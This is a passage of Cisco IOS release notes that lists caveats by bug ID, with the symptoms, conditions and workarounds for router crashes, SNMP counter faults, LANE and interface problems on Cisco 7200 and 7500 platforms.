Conditions: This symptom is observed when the no ipv6 pim command is entered on some subinterfaces of a physical Ethernet interface and PIM is enabled on several subinterfaces of the same physical Ethernet interface.

This symptom affects both IPv4 and IPv6, for multicast and for OSPF Hello messages.

Workaround: There is no workaround.

CSCee42381

Symptoms: A Cisco MC3810 reloads when you configure ILMI on an ATM interface.

Conditions: This symptom is observed on a Cisco MC3810 that runs Cisco IOS Release 12.3(9).

Workaround: There is no workaround.

IBM Connectivity

CSCed77877

Symptom: A 4-port serial enhanced port adapter (PA-4T+) may not function when the Synchronous Data Link Control (SDLC) protocol is configured.

Conditions: This symptom is observed on a Cisco 7200.

Workaround: Reload the router to re-initialize the role used in the previous connection.

CSCee40967

Symptoms: A Cisco router may crash due to a bus error if a PA-A1-OC3MM ATM port adapter is installed but not configured for ATM LANE.

Conditions: This symptom is observed on a Cisco router that runs Cisco IOS interim Release 12.3(8.4a), which is an interim release for Release 12.3(9).

Workaround: There is no workaround.

CSCin76076

Symptoms: A Cisco router that functions as a LANE server may fail to attain the active state and remains in the backup state regardless of the priority. This situation prevents LANE clients from becoming operational.

Conditions: This symptom is observed on a Cisco 7200 series and Cisco 7500 series that run Cisco IOS interim Release 12.3(8.4) and later interim releases. The symptom may also occur in other releases.

Workaround: There is no workaround.

Interfaces and Bridging

CSCeb59227

Symptoms: The ifOutUcastPkts, ifOutOctets, and ifHCOutOctets Simple Network Management Protocol (SNMP) counters of a Fast Ethernet subinterface may not be incremented.

Conditions: This symptom is observed on a Cisco 7500 series when traffic is received from a serial interface in a Multiprotocol Label Switching (MPLS) network and when the Fast Ethernet subinterface is configured for dot1q encapsulation.

Workaround: There is no workaround.

CSCeb81473

Symptoms: A Cisco 7500 series that is configured as a bridge may not pass bridged traffic on a FDDI interface. This situation may lead to a loss of connectivity.

Conditions: This symptom is observed on Cisco 7500 series that runs a Cisco IOS rsp-jsv-mz image.

Workaround: Enter the shutdown interface configuration command followed by the no shutdown interface configuration command on the FDDI interface.

CSCec87736

Symptoms: TX Simple Network Management Protocol (SNMP) counters do not update on Fast Ethernet subinterfaces for distributed Cisco Express Forwarding (dCEF) traffic.

Conditions: This symptom is observed on Cisco IOS Release 12.0(26)S and Release 12.3. The hardware is DEC21140A, and the interface receiving the traffic is not located on the same Versatile Interface Processor (VIP).

Workaround: There is no workaround.

CSCee44827

Symptoms: Spurious memory accesses may occur on a VIP with a PA-FE.

Conditions: This symptom is observed on a Cisco 7500 series when a raw Ethernet packet is received on the PA-FE interface that is configured as an ISL trunk.

Workaround: There is no workaround.

CSCin58433

Symptoms: The driver code of a third-party vendor Fast Ethernet controller that is part of a C7200-I/O-FE I/O controller may pause indefinitely or reload unexpectedly.

Conditions: This symptom is observed on a Cisco 7200 series when a packet enters the third-party vendor Fast Ethernet controller, when this packet is forwarded to a Multilink PPP (MLP) interface, and when another packet is forwarded by the third-party vendor Fast Ethernet controller before the first packet has left the MLP interface.

Workaround: There is no workaround.

CSCin67296

Symptoms: Channelized interfaces on a channelized T3 line card or port adapter that is configured for Frame Relay encapsulation may be in the up/down state, and DLCIs are inactive.

Conditions: This symptom is observed when you reload a Cisco platform and when the interfaces were in the up/up state before you reloaded the platform.

Workaround: Enter the